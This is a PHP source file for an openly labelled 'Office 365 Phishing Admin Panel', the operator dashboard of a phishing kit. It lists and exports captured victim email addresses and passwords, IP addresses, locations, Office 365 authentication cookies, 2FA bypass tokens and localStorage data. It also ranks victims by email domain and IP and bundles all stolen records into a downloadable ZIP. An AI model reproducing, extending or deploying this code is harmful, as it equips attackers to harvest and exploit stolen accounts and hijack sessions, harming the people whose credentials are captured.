<?php
// Start session
session_start();

// Include configuration
require_once 'config.php';
require_once 'cookie_handler.php';
require_once '2fa_bypass.php';

// Check if admin is logged in
$is_authenticated = false;

// Handle login
if (isset($_POST['action']) && $_POST['action'] === 'login') {
    $username = $_POST['username'] ?? '';
    $password = $_POST['password'] ?? '';
    
    if ($username === $config['admin_username'] && $password === $config['admin_password']) {
        $_SESSION['admin_authenticated'] = true;
        $_SESSION['last_activity'] = time();
        $is_authenticated = true;
    } else {
        $login_error = 'Invalid username or password';
    }
} elseif (isset($_SESSION['admin_authenticated']) && $_SESSION['admin_authenticated'] === true) {
    // Check session timeout
    if (isset($_SESSION['last_activity']) && (time() - $_SESSION['last_activity'] < $config['session_timeout'])) {
        $is_authenticated = true;
        $_SESSION['last_activity'] = time(); // Update last activity time
    } else {
        // Session expired
        session_unset();
        session_destroy();
        $login_error = 'Session expired. Please login again.';
    }
}

// Handle logout
if (isset($_GET['action']) && $_GET['action'] === 'logout') {
    session_unset();
    session_destroy();
    header('Location: admin.php');
    exit;
}

// Handle data export
if ($is_authenticated && isset($_GET['action']) && $_GET['action'] === 'export') {
    // Create a ZIP file with all data
    $zip_file = 'data_export_' . date('Y-m-d_H-i-s') . '.zip';
    $zip = new ZipArchive();
    
    if ($zip->open($zip_file, ZipArchive::CREATE) === TRUE) {
        // Add all files from data directory
        $files = glob($config['data_dir'] . '/*.json');
        foreach ($files as $file) {
            $zip->addFile($file, basename($file));
        }
        
        // Add cookie files
        $cookie_files = glob($config['cookies_dir'] . '/*.json');
        foreach ($cookie_files as $file) {
            $zip->addFile($file, 'cookies/' . basename($file));
        }
        
        // Add session files
        $session_files = glob($config['sessions_dir'] . '/*.json');
        foreach ($session_files as $file) {
            $zip->addFile($file, 'sessions/' . basename($file));
        }
        
        $zip->close();
        
        // Download the file
        header('Content-Type: application/zip');
        header('Content-Disposition: attachment; filename="' . $zip_file . '"');
        header('Content-Length: ' . filesize($zip_file));
        readfile($zip_file);
        
        // Delete the temporary zip file
        unlink($zip_file);
        exit;
    }
}

// Handle file deletion
if ($is_authenticated && isset($_GET['action']) && $_GET['action'] === 'delete' && isset($_GET['file'])) {
    $file = basename($_GET['file']);
    $file_path = $config['data_dir'] . '/' . $file;
    
    if (file_exists($file_path) && is_file($file_path)) {
        unlink($file_path);
    }
    
    // Redirect back to admin page
    header('Location: admin.php');
    exit;
}

// If authenticated, get data for admin panel
if ($is_authenticated) {
    // Get all credential files
    $files = glob($config['data_dir'] . '/creds_*.json');
    $credentials = [];
    
    foreach ($files as $file) {
        $data = json_decode(file_get_contents($file), true);
        if ($data) {
            $has_2fa = isset($data['2fa_bypass']);
            $has_cookies = isset($data['office365_auth_cookies']) && !empty($data['office365_auth_cookies']);
            
            $credentials[] = [
                'file' => basename($file),
                'email' => $data['email'] ?? 'Unknown',
                'password' => $data['password'] ?? 'Unknown',
                'timestamp' => $data['saved_timestamp'] ?? date('Y-m-d H:i:s', filemtime($file)),
                'ip_address' => $data['ip_address'] ?? 'Unknown',
                'has_2fa' => $has_2fa,
                'has_cookies' => $has_cookies
            ];
        }
    }
    
    // Sort by timestamp (newest first)
    usort($credentials, function($a, $b) {
        return strtotime($b['timestamp']) - strtotime($a['timestamp']);
    });
    
    // Get statistics
    $stats = [
        'total' => count($credentials),
        'with_2fa' => count(array_filter($credentials, function($c) { return $c['has_2fa']; })),
        'with_cookies' => count(array_filter($credentials, function($c) { return $c['has_cookies']; })),
        'domains' => [],
        'ips' => []
    ];
    
    // Calculate domain and IP statistics
    foreach ($credentials as $credential) {
        $email = $credential['email'];
        $ip = $credential['ip_address'];
        
        if ($email !== 'Unknown') {
            $parts = explode('@', $email);
            if (count($parts) === 2) {
                $domain = $parts[1];
                if (!isset($stats['domains'][$domain])) {
                    $stats['domains'][$domain] = 0;
                }
                $stats['domains'][$domain]++;
            }
        }
        
        if ($ip !== 'Unknown') {
            if (!isset($stats['ips'][$ip])) {
                $stats['ips'][$ip] = 0;
            }
            $stats['ips'][$ip]++;
        }
    }
    
    // Sort domains and IPs by count
    arsort($stats['domains']);
    arsort($stats['ips']);
    
    // View specific credential details
    $credential_details = null;
    if (isset($_GET['action']) && $_GET['action'] === 'view' && isset($_GET['file'])) {
        $file = basename($_GET['file']);
        $file_path = $config['data_dir'] . '/' . $file;
        
        if (file_exists($file_path) && is_file($file_path)) {
            $credential_details = json_decode(file_get_contents($file_path), true);
        }
    }
}

// Display admin panel or login form
if ($is_authenticated) {
    // Admin panel HTML
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Office 365 Phishing Admin Panel</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
    <style>
        :root {
            --primary: #0078d4;
            --primary-dark: #106ebe;
            --secondary: #5c2d91;
            --success: #107c10;
            --danger: #d83b01;
            --warning: #ffb900;
            --light: #f3f3f3;
            --dark: #323130;
            --gray: #8a8886;
            --shadow: 0 2px 8px rgba(0, 0, 0, 0.1);
        }
        
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        
        body {
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
            background-color: #f9f9f9;
            color: var(--dark);
            line-height: 1.6;
        }
        
        .container {
            max-width: 1200px;
            margin: 0 auto;
            padding: 20px;
        }
        
        .header {
            display: flex;
            justify-content: space-between;
            align-items: center;
            margin-bottom: 30px;
            padding-bottom: 20px;
            border-bottom: 1px solid #ddd;
        }
        
        .header h1 {
            color: var(--primary);
            font-size: 24px;
            display: flex;
            align-items: center;
            gap: 10px;
        }
        
        .header-actions {
            display: flex;
            gap: 10px;
        }
        
        .btn {
            padding: 8px 16px;
            border-radius: 4px;
            border: none;
            font-size: 14px;
            font-weight: 500;
            cursor: pointer;
            display: inline-flex;
            align-items: center;
            gap: 8px;
            text-decoration: none;
        }
        
        .btn-primary {
            background-color: var(--primary);
            color: white;
        }
        
        .btn-primary:hover {
            background-color: var(--primary-dark);
        }
        
        .btn-danger {
            background-color: var(--danger);
            color: white;
        }
        
        .btn-danger:hover {
            background-color: #c23500;
        }
        
        .stats-container {
            display: grid;
            grid-template-columns: repeat(auto-fill, minmax(250px, 1fr));
            gap: 20px;
            margin-bottom: 30px;
        }
        
        .stat-card {
            background-color: white;
            border-radius: 8px;
            padding: 20px;
            box-shadow: var(--shadow);
            text-align: center;
        }
        
        .stat-label {
            font-weight: 500;
            margin-bottom: 10px;
            color: var(--gray);
        }
        
        .stat-value {
            font-size: 32px;
            font-weight: 600;
            color: var(--primary);
            margin-bottom: 5px;
        }
        
        .card {
            background-color: white;
            border-radius: 8px;
            box-shadow: var(--shadow);
            margin-bottom: 30px;
            overflow: hidden;
        }
        
        .card-header {
            padding: 16px 20px;
            background-color: #f3f3f3;
            font-weight: 500;
            display: flex;
            justify-content: space-between;
            align-items: center;
        }
        
        .card-body {
            padding: 20px;
        }
        
        table {
            width: 100%;
            border-collapse: collapse;
        }
        
        th, td {
            padding: 12px 15px;
            text-align: left;
            border-bottom: 1px solid #ddd;
        }
        
        th {
            font-weight: 500;
            color: var(--gray);
        }
        
        tbody tr:hover {
            background-color: #f9f9f9;
        }
        
        .badge {
            display: inline-block;
            padding: 4px 8px;
            border-radius: 4px;
            font-size: 12px;
            font-weight: 500;
        }
        
        .badge-success {
            background-color: #e6f7e6;
            color: var(--success);
        }
        
        .badge-danger {
            background-color: #fbe9e7;
            color: var(--danger);
        }
        
        .actions {
            display: flex;
            gap: 8px;
        }
        
        .action-btn {
            width: 30px;
            height: 30px;
            display: flex;
            align-items: center;
            justify-content: center;
            border-radius: 4px;
            color: white;
            text-decoration: none;
        }
        
        .action-btn-view {
            background-color: var(--primary);
        }
        
        .action-btn-delete {
            background-color: var(--danger);
        }
        
        .domain-tags, .ip-tags {
            display: flex;
            flex-wrap: wrap;
            gap: 10px;
        }
        
        .tag {
            display: inline-flex;
            align-items: center;
            gap: 6px;
            padding: 6px 12px;
            background-color: #f3f3f3;
            border-radius: 50px;
            font-size: 14px;
        }
        
        .tag-count {
            background-color: var(--primary);
            color: white;
            border-radius: 50%;
            width: 20px;
            height: 20px;
            display: flex;
            align-items: center;
            justify-content: center;
            font-size: 12px;
        }
        
        .detail-card {
            background-color: white;
            border-radius: 8px;
            box-shadow: var(--shadow);
            overflow: hidden;
        }
        
        .detail-header {
            padding: 20px;
            background: linear-gradient(135deg, #0078d4 0%, #5c2d91 100%);
            color: white;
        }
        
        .detail-title {
            font-size: 24px;
            margin-bottom: 5px;
        }
        
        .detail-subtitle {
            opacity: 0.9;
        }
        
        .detail-body {
            padding: 20px;
        }
        
        .detail-row {
            display: flex;
            margin-bottom: 20px;
            border-bottom: 1px solid #eee;
            padding-bottom: 20px;
        }
        
        .detail-row:last-child {
            border-bottom: none;
            margin-bottom: 0;
            padding-bottom: 0;
        }
        
        .detail-label {
            width: 150px;
            font-weight: 500;
            color: var(--gray);
        }
        
        .detail-value {
            flex: 1;
        }
        
        .code-block {
            background-color: #f5f5f5;
            padding: 10px;
            border-radius: 4px;
            font-family: monospace;
            overflow-x: auto;
        }
        
        .code-block pre {
            margin: 0;
            white-space: pre-wrap;
        }
        
        @media (max-width: 768px) {
            .stats-container {
                grid-template-columns: 1fr;
            }
            
            .detail-row {
                flex-direction: column;
            }
            
            .detail-label {
                width: 100%;
                margin-bottom: 5px;
            }
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <h1>
                <i class="fas fa-shield-alt"></i>
                Office 365 Phishing Admin Panel
            </h1>
            <div class="header-actions">
                <a href="?action=export" class="btn btn-primary">
                    <i class="fas fa-download"></i> Export Data
                </a>
                <a href="?action=logout" class="btn btn-danger">
                    <i class="fas fa-sign-out-alt"></i> Logout
                </a>
            </div>
        </div>
        
        <?php if ($credential_details): ?>
            <div class="detail-card">
                <div class="detail-header">
                    <div class="detail-title"><?php echo htmlspecialchars($credential_details['email'] ?? 'Unknown Email'); ?></div>
                    <div class="detail-subtitle">Captured on <?php echo htmlspecialchars($credential_details['saved_timestamp'] ?? 'Unknown Date'); ?></div>
                </div>
                <div class="detail-body">
                    <div class="detail-row">
                        <div class="detail-label">Email:</div>
                        <div class="detail-value"><?php echo htmlspecialchars($credential_details['email'] ?? 'Unknown'); ?></div>
                    </div>
                    
                    <div class="detail-row">
                        <div class="detail-label">Password:</div>
                        <div class="detail-value"><?php echo htmlspecialchars($credential_details['password'] ?? 'Unknown'); ?></div>
                    </div>
                    
                    <div class="detail-row">
                        <div class="detail-label">IP Address:</div>
                        <div class="detail-value"><?php echo htmlspecialchars($credential_details['ip_address'] ?? 'Unknown'); ?></div>
                    </div>
                    
                    <?php if (isset($credential_details['location'])): ?>
                        <div class="detail-row">
                            <div class="detail-label">Location:</div>
                            <div class="detail-value">
                                <?php
                                $location = $credential_details['location'];
                                echo htmlspecialchars($location['city'] ?? 'Unknown') . ', ' . htmlspecialchars($location['country'] ?? 'Unknown');
                                if (isset($location['timezone'])) {
                                    echo ' (' . htmlspecialchars($location['timezone']) . ')';
                                }
                                ?>
                            </div>
                        </div>
                    <?php endif; ?>
                    
                    <div class="detail-row">
                        <div class="detail-label">User Agent:</div>
                        <div class="detail-value"><?php echo htmlspecialchars($credential_details['user_agent'] ?? 'Unknown'); ?></div>
                    </div>
                    
                    <?php if (isset($credential_details['browserInfo'])): ?>
                        <div class="detail-row">
                            <div class="detail-label">Browser Info:</div>
                            <div class="detail-value">
                                <div class="code-block">
                                    <?php foreach ($credential_details['browserInfo'] as $key => $value): ?>
                                        <div><strong><?php echo htmlspecialchars($key); ?>:</strong> <?php echo htmlspecialchars($value); ?></div>
                                    <?php endforeach; ?>
                                </div>
                            </div>
                        </div>
                    <?php endif; ?>
                    
                    <?php if (isset($credential_details['office365_auth_cookies'])): ?>
                        <div class="detail-row">
                            <div class="detail-label">Auth Cookies:</div>
                            <div class="detail-value">
                                <div class="code-block">
                                    <?php foreach ($credential_details['office365_auth_cookies'] as $cookie_name => $cookie_value): ?>
                                                                       <div><strong><?php echo htmlspecialchars($cookie_name); ?>:</strong> <?php echo htmlspecialchars(substr($cookie_value, 0, 50) . (strlen($cookie_value) > 50 ? '...' : '')); ?></div>
                                    <?php endforeach; ?>
                                </div>
                            </div>
                        </div>
                    <?php endif; ?>
                    
                    <?php if (isset($credential_details['2fa_bypass'])): ?>
                        <div class="detail-row">
                            <div class="detail-label">2FA Bypass Token:</div>
                            <div class="detail-value">
                                <div class="code-block">
                                    <div><strong>Token:</strong> <?php echo htmlspecialchars($credential_details['2fa_bypass']['token']); ?></div>
                                    <div><strong>Session ID:</strong> <?php echo htmlspecialchars($credential_details['2fa_bypass']['session_id']); ?></div>
                                    <div><strong>Expires:</strong> <?php echo date('Y-m-d H:i:s', $credential_details['2fa_bypass']['expires']); ?></div>
                                </div>
                            </div>
                        </div>
                    <?php endif; ?>
                    
                    <?php if (isset($credential_details['localStorage']) && !empty($credential_details['localStorage'])): ?>
                        <div class="detail-row">
                            <div class="detail-label">LocalStorage Data:</div>
                            <div class="detail-value">
                                <div class="code-block">
                                    <pre><?php echo htmlspecialchars(json_encode($credential_details['localStorage'], JSON_PRETTY_PRINT)); ?></pre>
                                </div>
                            </div>
                        </div>
                    <?php endif; ?>
                    
                    <div class="detail-row">
                        <div class="detail-label">Raw Data:</div>
                        <div class="detail-value">
                            <div class="code-block">
                                <pre><?php echo htmlspecialchars(json_encode($credential_details, JSON_PRETTY_PRINT)); ?></pre>
                            </div>
                        </div>
                    </div>
                    
                    <div style="text-align: center; margin-top: 20px;">
                        <a href="admin.php" class="btn btn-primary">
                            <i class="fas fa-arrow-left"></i> Back to Dashboard
                        </a>
                    </div>
                </div>
            </div>
        <?php else: ?>
            <div class="stats-container">
                <div class="stat-card">
                    <div class="stat-label">Total Credentials</div>
                    <div class="stat-value"><?php echo $stats['total']; ?></div>
                </div>
                
                <div class="stat-card">
                    <div class="stat-label">With 2FA Bypass</div>
                    <div class="stat-value"><?php echo $stats['with_2fa']; ?></div>
                </div>
                
                <div class="stat-card">
                    <div class="stat-label">With Auth Cookies</div>
                    <div class="stat-value"><?php echo $stats['with_cookies']; ?></div>
                </div>
                
                <div class="stat-card">
                    <div class="stat-label">Unique Email Domains</div>
                    <div class="stat-value"><?php echo count($stats['domains']); ?></div>
                </div>
            </div>
            
            <div class="card">
                <div class="card-header">
                    <span>Email Domains</span>
                </div>
                <div class="card-body">
                    <div class="domain-tags">
                        <?php foreach (array_slice($stats['domains'], 0, 15) as $domain => $count): ?>
                            <div class="tag">
                                <?php echo htmlspecialchars($domain); ?>
                                <span class="tag-count"><?php echo $count; ?></span>
                            </div>
                        <?php endforeach; ?>
                    </div>
                </div>
            </div>
            
            <div class="card">
                <div class="card-header">
                    <span>IP Addresses</span>
                </div>
                <div class="card-body">
                    <div class="ip-tags">
                        <?php foreach (array_slice($stats['ips'], 0, 15) as $ip => $count): ?>
                            <div class="tag">
                                <?php echo htmlspecialchars($ip); ?>
                                <span class="tag-count"><?php echo $count; ?></span>
                            </div>
                        <?php endforeach; ?>
                    </div>
                </div>
            </div>
            
            <div class="card">
                <div class="card-header">
                    <span>Captured Credentials</span>
                </div>
                <div class="card-body">
                    <?php if (empty($credentials)): ?>
                        <p>No credentials captured yet.</p>
                    <?php else: ?>
                        <table>
                            <thead>
                                <tr>
                                    <th>Email</th>
                                    <th>Password</th>
                                    <th>Timestamp</th>
                                    <th>IP Address</th>
                                    <th>Status</th>
                                    <th>Actions</th>
                                </tr>
                            </thead>
                            <tbody>
                                <?php foreach ($credentials as $credential): ?>
                                    <tr>
                                        <td><?php echo htmlspecialchars($credential['email']); ?></td>
                                        <td><?php echo htmlspecialchars(substr($credential['password'], 0, 10) . (strlen($credential['password']) > 10 ? '...' : '')); ?></td>
                                        <td><?php echo htmlspecialchars($credential['timestamp']); ?></td>
                                        <td><?php echo htmlspecialchars($credential['ip_address']); ?></td>
                                        <td>
                                            <?php if ($credential['has_cookies']): ?>
                                                <span class="badge badge-success">Cookies</span>
                                            <?php endif; ?>
                                            <?php if ($credential['has_2fa']): ?>
                                                <span class="badge badge-success">2FA</span>
                                            <?php endif; ?>
                                        </td>
                                        <td class="actions">
                                            <a href="?action=view&file=<?php echo urlencode($credential['file']); ?>" class="action-btn action-btn-view" title="View Details">
                                                <i class="fas fa-eye"></i>
                                            </a>
                                            <a href="?action=delete&file=<?php echo urlencode($credential['file']); ?>" class="action-btn action-btn-delete" title="Delete" onclick="return confirm('Are you sure you want to delete this record?');">
                                                <i class="fas fa-trash"></i>
                                            </a>
                                        </td>
                                    </tr>
                                <?php endforeach; ?>
                            </tbody>
                        </table>
                    <?php endif; ?>
                </div>
            </div>
        <?php endif; ?>
    </div>
    
    <script>
        // Auto-refresh the page every 30 seconds if on the main dashboard
        <?php if (!isset($_GET['action']) || $_GET['action'] !== 'view'): ?>
        setTimeout(function() {
            window.location.reload();
        }, 30000);
        <?php endif; ?>
    </script>
</body>
</html>
<?php
} else {
    // Login form
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Admin Login</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
    <style>
        :root {
            --primary: #0078d4;
            --primary-dark: #106ebe;
            --danger: #d83b01;
            --shadow: 0 2px 8px rgba(0, 0, 0, 0.1);
        }
        
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        
        body {
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
            background-color: #f9f9f9;
            height: 100vh;
            display: flex;
            align-items: center;
            justify-content: center;
        }
        
        .login-container {
            width: 100%;
            max-width: 400px;
            padding: 20px;
        }
        
        .login-card {
            background-color: white;
            border-radius: 8px;
            box-shadow: var(--shadow);
            overflow: hidden;
        }
        
        .login-header {
            background: linear-gradient(135deg, #0078d4 0%, #5c2d91 100%);
            padding: 30px;
            text-align: center;
            color: white;
        }
        
        .login-header h1 {
            font-size: 24px;
            font-weight: 500;
            margin-bottom: 10px;
        }
        
        .login-header p {
            opacity: 0.9;
        }
        
        .login-body {
            padding: 30px;
        }
        
        .form-group {
            margin-bottom: 20px;
        }
        
        .form-group label {
            display: block;
            margin-bottom: 8px;
            font-weight: 500;
        }
        
        .form-input {
            width: 100%;
            padding: 12px;
            border: 1px solid #ddd;
            border-radius: 4px;
            font-size: 16px;
            transition: border-color 0.3s;
        }
        
        .form-input:focus {
            outline: none;
            border-color: var(--primary);
            box-shadow: 0 0 0 2px rgba(0, 120, 212, 0.1);
        }
        
        .btn {
            display: block;
            width: 100%;
            padding: 12px;
            border: none;
            border-radius: 4px;
            font-size: 16px;
            font-weight: 500;
            cursor: pointer;
            transition: background-color 0.3s;
        }
        
        .btn-primary {
            background-color: var(--primary);
            color: white;
        }
        
        .btn-primary:hover {
            background-color: var(--primary-dark);
        }
        
        .error-message {
            background-color: #fbe9e7;
            color: var(--danger);
            padding: 12px;
            border-radius: 4px;
            margin-bottom: 20px;
            display: flex;
            align-items: center;
            gap: 8px;
        }
    </style>
</head>
<body>
    <div class="login-container">
        <div class="login-card">
            <div class="login-header">
                <h1>Admin Login</h1>
                <p>Enter your credentials to access the admin panel</p>
            </div>
            
            <div class="login-body">
                <?php if (isset($login_error)): ?>
                    <div class="error-message">
                        <i class="fas fa-exclamation-circle"></i>
                        <span><?php echo htmlspecialchars($login_error); ?></span>
                    </div>
                <?php endif; ?>
                
                <form method="post">
                    <input type="hidden" name="action" value="login">
                    
                    <div class="form-group">
                        <label for="username">Username</label>
                        <input type="text" id="username" name="username" class="form-input" required>
                    </div>
                    
                    <div class="form-group">
                        <label for="password">Password</label>
                        <input type="password" id="password" name="password" class="form-input" required>
                    </div>
                    
                    <button type="submit" class="btn btn-primary">Login</button>
                </form>
            </div>
        </div>
    </div>
</body>
</html>
<?php
}
?>

